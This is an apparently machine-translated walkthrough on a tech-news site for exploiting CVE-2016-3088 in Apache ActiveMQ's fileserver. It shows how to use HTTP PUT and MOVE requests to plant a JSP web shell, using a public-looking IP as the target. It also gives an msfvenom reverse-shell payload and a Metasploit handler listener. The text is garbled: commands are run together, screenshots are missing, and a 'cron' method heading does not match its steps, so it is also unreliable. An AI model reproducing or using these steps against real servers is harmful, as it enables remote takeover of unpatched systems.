Apache ActiveMQ remote code execution vulnerability (CVE- 01/28 Update SLTechnology News&Howtos

Apache ActiveMQ remote code execution vulnerability (CVE-

2025-01-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Introduction: on April 14, 2016, foreign security researcher Simon Zuckerbraun exposed multiple security vulnerabilities in Apache ActiveMQ Fileserver, which can enable remote users to replace Web applications with malicious code and execute remote code on the affected system (CVE-2016-3088). Port 8161 is a web console port, and this vulnerability occurs in the web console. ActiveMQ's web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, and fileserver is the interface for storing files; both admin and api need to be logged in before they can be used, and fileserver does not need to be logged in. Fileserver is a RESTful API interface, and we can read and write the files stored in it through GET, PUT, DELETE and other HTTP requests. It is designed to make up for the defect that the message queue operation can not transfer and store binary files, but later found that its utilization rate is not high and the file operation is prone to loopholes. Therefore, in the 5.12.x~5.13.x version of ActiveMQ, the fileserver app has been turned off by default (you can open it in conf/jetty.xml); after version 5.14.0, the fileserver app has been completely deleted.

Method 1. Write shell directly

After visiting http://120.79.1.70:8161/fileserver, intercept directly with bp, change post to put and add a few lines to the end.

As shown below: chen.txt:

Return 204indicates success, and then change put to move followed by a line.

Destination: file:///opt/activemq/webapps/api/s.jsp

Finally, it is successful to directly visit and add an api after it.

Method 2. Writing shell by using cron timing Task

Now generate a * in kali

Msfvenom-p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r > bing.jsp

Then upload it to the desktop and open it as shown below:

Add a line after the first line as before

Destination: file:///opt/activemq/webapps/api/s.jsp

Go to the website to see if there is any

Then open kali.

Use exploit/multi/handlerset payload java/jsp_shell_reverse_tcpset lhost 192.168.199.109set lport 9999run

Monitor and you will succeed!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.